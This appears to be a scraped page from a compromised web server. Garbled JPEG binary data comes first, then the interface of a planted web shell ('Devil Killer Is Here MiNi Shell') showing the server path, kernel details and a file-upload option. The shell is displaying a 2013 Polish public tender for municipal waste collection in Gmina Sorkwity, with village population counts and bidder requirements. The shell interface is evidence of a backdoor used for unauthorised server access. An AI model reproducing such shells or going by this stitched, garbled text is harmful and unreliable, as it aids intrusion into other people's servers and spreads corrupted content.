JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130417/151022-N-2013.html

<p class="kh_header"><b>Sorkwity: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY SORKWITY</b><br>
<b>Numer ogłoszenia: 151022 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sorkwity , ul. Olsztyńska 16a, 11-731 Sorkwity, woj. warmińsko-mazurskie, tel. 0-89 742-81-79, faks 0-89 742-85-30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sorkwity.gmina@mragowo.net</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://bip.warmia.mazury.pl/sorkwity_gmina_wiejska</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH NA TERENIE GMINY SORKWITY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4. OPIS PRZEDMIOTU ZAMÓWIENIA
4.1 Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie gminy Sorkwity.
Gmina Sorkwity liczy: 4839 mieszkańców ok. 1200 gospodarstw podzielonych na 20 sołectw.
Zbiórka, wywóz i zagospodarowanie odpadów winno odbywać się zgodnie                z wytycznymi 
Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Warmińsko -Mazurskiego na lata 2011 - 2016 oraz przepisami prawa polskiego.
4.2  ZABUDOWA JEDNORODZINNA I WIELORODZINNA
Na terenie zabudowy jednorodzinnej i wielorodzinnej obowiązywać będzie system mieszany (workowo - pojemnikowy) zbiórki odpadów komunalnych.
a) niesegregowane (zmieszane) odpady komunalne (kod odpadu 20 03 01)
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach     lub workach (w przypadku utrudnionego dojazdu do nieruchomości pojazdów ciężarowych).  Pojemniki zapewnia właściciel nieruchomości.
Częstotliwość załadunku i wywozu -1 raz na dwa tygodnie  w zabudowie wielorodzinnej, 1 raz na dwa tygodnie w zabudowie jednorodzinnej.
b) selektywnie zbierane odpady komunalne 
Selektywna zbiórka odpadów komunalnych będzie się odbywać w systemie workowym i pojemnikowym. 
Wprowadza się następujące rodzaje worków i pojemników:
żółty- z przeznaczeniem na tworzywa sztuczne ( kody 20 01 39, 15 01 02),
niebieski - z przeznaczeniem na makulaturę i tekstylia  (kody 20 01 01, 15 01 01),
zielony - z przeznaczeniem na szkło i opakowania szklane (kody 20 01 02, 15 01 07),
brązowy - z przeznaczeniem na zbieranie odpadów zielonych (kod 20 02 01).
Worki i pojemniki dostarcza Wykonawca w zależności od potrzeb mieszkańców
Częstotliwość załadunku i wywozu - 1 raz na miesiąc.
Liczba worków na odpady zbierane selektywnie z gospodarstw domowych w posesjach min. 4800, max 7200 sztuk na miesiąc. Jest to wielkość szacunkowa, w przypadku zmiany liczby mieszkańców i gospodarstw domowych Wykonawca będzie zobowiązany do zapewnienia większej ilości worków. 
c) odpady wielkogabarytowe (kod 20 03 07) i zużyty sprzęt elektryczny  i elektroniczny (kody 20 01 23, 20 01 35* i 20 01 36)
Odbiór odpadów wielkogabarytowych, zużyty sprzęt elektryczny i elektroniczny będzie odbywać się poprzez odbieranie wystawionych  odpadów przez właścicieli przed swoimi nieruchomości w terminach wyznaczonych  przez Wykonawcę.
Częstotliwość załadunku i wywozu - dwa razy w roku ( na wiosnę i jesienią)
W okresie między wystawkami mieszkańcy będą mogli własnym transportem dowieźć odpady do  punktu selektywnego zbierania odpadów komunalnych. 
d) odpady budowlane i rozbiórkowe o kodach 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 02 01, 17 02 02, 17 02 03, 17 08 02, 17 09 04, 20 03 99 pochodzące z remontów i innych robót   budowlanych wykonywanych we własnym zakresie, na wykonanie których nie jest wymagane uzyskanie pozwolenia na budowę lub na wykonanie, których  nie jest wymagane zgłoszenie do administracji budowlano - architektonicznej, należy zbierać selektywnie w pojemniku ustawionym przez przedsiębiorcę i oznakowanym numerem odpowiadającym właścicielowi,                 na którego żądanie pojemnik zostanie ustawiony.  
e) odpady niebezpieczne wysegregowane z odpadów komunalnych typu:
- przeterminowane leki ( kody 18 01 08*, 18 01 09) odbierane będą w punkcie aptecznym znajdującym się w niepublicznym zakładzie opieki zdrowotnej w Sorkwitach i niepublicznym zakładzie opieki zdrowotnej  w Warpunach,
- zużyte baterie i akumulatory inne niż przemysłowe i samochodowe odbierane będą   w punktach stacjonarnych (kody 16 06 03, 20 01 33) - wykaz punktów zostanie przekazany Wykonawcy. Pojemniki na zużyte baterie, zaopatrzone w małe otwory wrzutowe, dostarczy wykonawca w ilości  7 sztuk. 
Częstotliwość załadunku i wywozu - co najmniej 1 raz na 3 miesiące.
f) Pojemniki przeznaczone do selektywnej zbiórki odpadów typu dzwon z przeznaczeniem na szkło i plastik w ilości 50 szt. (24 szt. szkło i 26 szt. plastik) należy opróżniać z częstotliwością raz na miesiąc, a w razie zwiększonej ilości z częstotliwością nie dopuszczając do przepełnienia.
4.3 PUNKT SELEKTYWNEGO ZBIERANIA ODPADÓW
Wykonawca w terminie do 31 lipca 2013 r. na własny koszt zorganizuje i uruchomi punkt selektywnego zbierania odpadów komunalnych na terenie Gminy Sorkwity z godzinami pracy od poniedziałku do soboty w godzinach 7.00-15.00. Punkt powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym,
Miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniami czynników atmosferycznych. 
W punkcie selektywnego zbierania odpadów komunalnych odbierane będą: 
a) papier
b) tworzywa sztuczne
c) szkło
d) metal i opakowania wielomateriałowe
e) odpady zielone
f) przeterminowane leki
g) zużyte baterie  i akumulatory inne niż przemysłowe i samochodowe
h) chemikalia
i) farby
j) zużyte opony
4.4 WYKAZ URZĄDZEŃ DO GROMADZENIA ODPADÓW :
Do gromadzenia odpadów na terenie Gminy Sorkwity służą:
a) pojemniki: 60 l, 110 l, 120 l, 240 l, 1100 l, 7000 l dla Wspólnot Mieszkaniowych  w przypadku ograniczonego terenu do ustawienia powyższych pojemników.
Do selektywnej zbiórki odpadów Wykonawca jest zobowiązany dostarczyć:
b) worki wykonane z folii polietylenowych o grubości dostosowanej do ilości odpadów, uniemożliwiającej rozerwanie się worka, w kolorach i pojemności;
żółty - 120 l,
niebieski - 120 l
zielony - 120 l 
brązowy - 120 l
Na workach umieszcza się w widocznym miejscu na tle, odpowiadającym kolorom dla danego rodzaju odpadów widoczny napis: 
1) PAPIER - z przeznaczeniem na makulaturę i tekstylia
2) PLASTIK - z przeznaczeniem na tworzywa sztuczne
3) SZKŁO - z przeznaczeniem na szkło i opakowania szklane kolorowe.
4) ZIELONE - z przeznaczeniem na zbieranie odpadów zielonych
Wielkość pojemników powinna być dostosowana do potrzeb użytkownika.
Gmina Sorkwity posiada 50 sztuk pojemników typu Dzwon przeznaczonych do selektywnej zbiórki odpadów (24 szt. - z przeznaczeniem na szkło, 26 szt. - z przeznaczeniem na tworzywa sztuczne), które Zamawiający przekaże do dyspozycji Wykonawcy przez cały okres trwania umowy. Wykonawca określi miejsca ustawienia tych pojemników w uzgodnieniu z Zamawiającym.
4.5 WYKAZ SPRZĘTU TECHNICZNEGO
Wykonawca musi posiadać sprzęt niezbędny do realizacji zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału w tym minimalne wymagania: 
1) W posiadaniu podmiotu odbierającego odpady komunalne powinny znajdować się, co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych (śmieciarki),
- dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych,
- jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
2) Wymagania dla bazy magazynowo -transportowej:
- baza magazynowo - transportowa powinna być usytuowana w gminie, z terenu której odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawny,
- teren bazy transportowej powinien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym,
- baza magazynowo - transportowa powinna być wyposażona w:
a) miejsca przeznaczone do parkowania pojazdów,
b) pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
c) miejsca magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
d) legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów,
- miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny      być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych, 
- na terenie bazy transportowej powinien znajdować się punkt bieżącej konserwacji i napraw pojazdów, miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy transportowej. 
- teren bazy magazynowo - transportowej powinien być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001r. Prawo wodne (Dz. U. z 2012r., poz. 145, 951, i 1513 oraz z 2013r. poz. 21).
3)W zakresie wymagań technicznych dotyczących wyposażania pojazdów należy zapewnić, aby:
a) konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady
b) pojazdy były wyposażone w system:
- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
czujników zapisujących dane o miejscach wyładunku odpadów - umożliwiający weryfikację tych danych;
c) pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.
4.6 SZCZEGÓŁOWE DANE CHARAKTERYZUJĄCE ZAMÓWIENIE
1) Zestawienie miejscowości z wykazem ilości gospodarstw domowych oraz liczbą mieszkańców:
Sołectwo 
1. Borowe 
Miejscowości wchodzące w skład sołectwa Borowe 
Liczba mieszkańców w miejscowości 110 
Liczba gospodarstw domowych 28

Sołectwo 
2. Borowski Las
Miejscowości wchodzące w skład sołectwa Borowski Las
Liczba mieszkańców w miejscowości 55
Liczba gospodarstw domowych 11

Sołectwo 
3.Burszewo
Miejscowości wchodzące w skład sołectwa Burszewo
Liczba mieszkańców w miejscowości 221
Liczba gospodarstw domowych 47

Sołectwo 
4. Choszczewo
Miejscowości wchodzące w skład sołectwa Choszczewo, Janiszewo
Liczba mieszkańców w miejscowości Choszczewo 248
Liczba gospodarstw domowych Choszczewo 52

Liczba mieszkańców w miejscowości Janiszewo 153
Liczba gospodarstw domowych Janiszewo 35

Sołectwo 
5. Stary Gieląd
Miejscowości wchodzące w skład sołectwa Stary Gieląd, Gieląd Mały, Nowy Gieląd
Liczba mieszkańców w miejscowości Stary Gieląd 202
Liczba gospodarstw domowych Stary Gieląd 29

Liczba mieszkańców w miejscowości Gieląd Mały  1
Liczba gospodarstw domowych Gieląd Mały  1

Liczba mieszkańców w miejscowości Nowy Gieląd 18
Liczba gospodarstw domowych Nowy Gieląd 3

Sołectwo 
6. Gizewo
Miejscowości wchodzące w skład sołectwa Gizewo
Liczba mieszkańców w miejscowości Gizewo 321
Liczba gospodarstw domowych Gizewo 59

Sołectwo 
7. Jełmuń
Miejscowości wchodzące w skład sołectwa Jełmuń
Liczba mieszkańców w miejscowości Jełmuń 40
Liczba gospodarstw domowych Jełmuń 10

Sołectwo 
8. Jędrychowo
Miejscowości wchodzące w skład sołectwa Jędrychowo, Janowo, Rodowo
Liczba mieszkańców w miejscowości Jędrychowo 82
Liczba gospodarstw domowych Jędrychowo 20

Liczba mieszkańców w miejscowości Janowo 20
Liczba gospodarstw domowych Janowo 9

Liczba mieszkańców w miejscowości Rodowo 33
Liczba gospodarstw domowych Rodowo 8

Sołectwo 
9. Kozłowo
Miejscowości wchodzące w skład sołectwa Kozłowo, Lesiny
Liczba mieszkańców w miejscowości Kozłowo 241
Liczba gospodarstw domowych Kozłowo 55

Liczba mieszkańców w miejscowości Lesiny 4
Liczba gospodarstw domowych Lesiny 1

Sołectwo 
10.Maradki
Miejscowości wchodzące w skład sołectwa Maradki, Głodowo, Maradzki Chojniak
Liczba mieszkańców w miejscowości Maradki 115
Liczba gospodarstw domowych Maradki 23

Liczba mieszkańców w miejscowości Głodowo 11
Liczba gospodarstw domowych Głodowo 3

Liczba mieszkańców w miejscowości Maradzki Chojniak 25
Liczba gospodarstw domowych Maradzki Chojniak 7

Sołectwo 
11.Nibork
Miejscowości wchodzące w skład sołectwa Nibork, Kozarek Wielki, Kozarek Mały, Szarłaty
Liczba mieszkańców w miejscowości Nibork 49
Liczba gospodarstw domowych Nibork 12

Liczba mieszkańców w miejscowości Kozarek Mały 34
Liczba gospodarstw domowych Kozarek Mały 10

Liczba mieszkańców w miejscowości Kozarek Wielki 95
Liczba gospodarstw domowych Kozarek Wielki 22


Liczba mieszkańców w miejscowości Szarłaty 5
Liczba gospodarstw domowych Szarłaty 1

Sołectwo 
12.Pustniki
Miejscowości wchodzące w skład sołectwa Pustniki
Liczba mieszkańców w miejscowości Pustniki 185
Liczba gospodarstw domowych Pustniki 47

Sołectwo 
13.Rozogi
Miejscowości wchodzące w skład sołectwa Rozogi
Liczba mieszkańców w miejscowości Rozogi 230
Liczba gospodarstw domowych Rozogi 61

Sołectwo 
14.Rybno
Miejscowości wchodzące w skład sołectwa Rybno, Karczewiec, Piłaki, Tyszkowo
Liczba mieszkańców w miejscowości Rybno 432
Liczba gospodarstw domowych Rybno 84

Liczba mieszkańców w miejscowości Karczewiec 26
Liczba gospodarstw domowych Karczewiec 5

Liczba mieszkańców w miejscowości Piłaki 3
Liczba gospodarstw domowych Piłaki 1

Liczba mieszkańców w miejscowości Tyszkowo 18
Liczba gospodarstw domowych Tyszkowo 1

Sołectwo 
15.Sorkwity
Miejscowości wchodzące w skład sołectwa Sorkwity, Miłuki
Liczba mieszkańców w miejscowości Sorkwity 642
Liczba gospodarstw domowych Sorkwity 193

Liczba mieszkańców w miejscowości Miłuki 73
Liczba gospodarstw domowych Miłuki 17

Sołectwo 
16. Stama
Miejscowości wchodzące w skład sołectwa Stama, Młynik
Liczba mieszkańców w miejscowości Stama 31
Liczba gospodarstw domowych Stama 7

Liczba mieszkańców w miejscowości Młynik 40
Liczba gospodarstw domowych Młynik 6

Sołectwo 
17. Surmówka
Miejscowości wchodzące w skład sołectwa Surmówka, Szelągówka
Liczba mieszkańców w miejscowości Surmówka 172
Liczba gospodarstw domowych Surmówka 33

Liczba mieszkańców w miejscowości Szelągówka 13
Liczba gospodarstw domowych Szelągówka 5

Sołectwo 
18. Szymanowo
Miejscowości wchodzące w skład sołectwa Szymanowo
Liczba mieszkańców w miejscowości Szymanowo 130
Liczba gospodarstw domowych Szymanowo 34

Sołectwo 
19. Warpuny
Miejscowości wchodzące w skład sołectwa Warpuny
Liczba mieszkańców w miejscowości Warpuny 471
Liczba gospodarstw domowych Warpuny 116

Sołectwo 
20.Zyndaki
Miejscowości wchodzące w skład sołectwa Zyndaki, Bałowo, Zamkowo
Liczba mieszkańców w miejscowości Zyndaki 243
Liczba gospodarstw domowych Zyndaki 57

Liczba mieszkańców w miejscowości Bałowo 40
Liczba gospodarstw domowych Bałowo 10

Liczba mieszkańców w miejscowości Zamkowo 7
Liczba gospodarstw domowych Zamkowo 1

2) Ilość odpadów zebranych z terenu Gminy Sorkwity w 2012 roku z podziałem na poszczególne frakcje przedstawia się następująco:
- odpady zmieszane - 721,11 Mg
- tworzywa sztuczne -15,32 Mg
- papier i tektura - 3,12 Mg
- opakowania szklane - 71,68 Mg

Wykonawca zobowiązany będzie do odbierania od właściciela nieruchomości każdej ilości zebranych odpadów komunalnych, według frakcji:
a) zmieszane odpady komunalne
b) papier
c) tworzywa sztuczne
d) szkło
e) metal i opakowania wielomateriałowe
f) odpady zielone
g) chemikalia 
h) zużyte opony
i) zużyte baterie i akumulatory
j) odpady rozbiórkowe i remontowe pochodzące z remontów i innych robót budowlanych wykonywanych we własnym zakresie, na wykonanie których nie jest wymagane uzyskanie pozwolenia na budowę 
k) odpady wielkogabarytowe
l) zużyty sprzęt elektryczny i elektroniczny.
Rozliczenie wynagrodzenia za wykonanie przedmiotu umowy nastąpi w miesięcznych ratach niezależnie od ilości zebranych odpadów. Wykonawca będzie zobowiązany odbierać odpady również z  nieruchomości, które powstaną w okresie trwania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ) oraz wpisu do rejestru działalności regulowanej gminy Sorkwity dot. prowadzenia działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (zaświadczenie o wpisie do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Sorkwity, w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ) oraz jeżeli wykonawcy również wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,     a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują cyklicznie przez okres co najmniej jednego roku jedno zadanie polegające na odbieraniu odpadów komunalnych od właścicieli nieruchomości o zbliżonym zakresie, jaki Zamawiający określił w pkt 4 SIWZ o wartości minimum 200 000 zł (słownie: dwieście tysięcy złotych) (wykaz złożony na druku stanowiącym załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ) oraz jeżeli wykażą, że posiadają co najmniej:
- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych 
(śmieciarki),
- dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych,
-  jeden pojazd do odbierania odpadów bez funkcji kompaktującej
Wykaz złożony na druku stanowiącym załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawcy złożą oświadczenie zgodnie                  z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wykonawców o spełnianiu warunków udziału w postępowaniu (oświadczenie złożone na druku stanowiącym załącznik nr 2 do SIWZ) oraz jeżeli wykonawcy wykażą, że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 300 000 tysięcy zł ( słownie: trzysta tysięcyzłotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

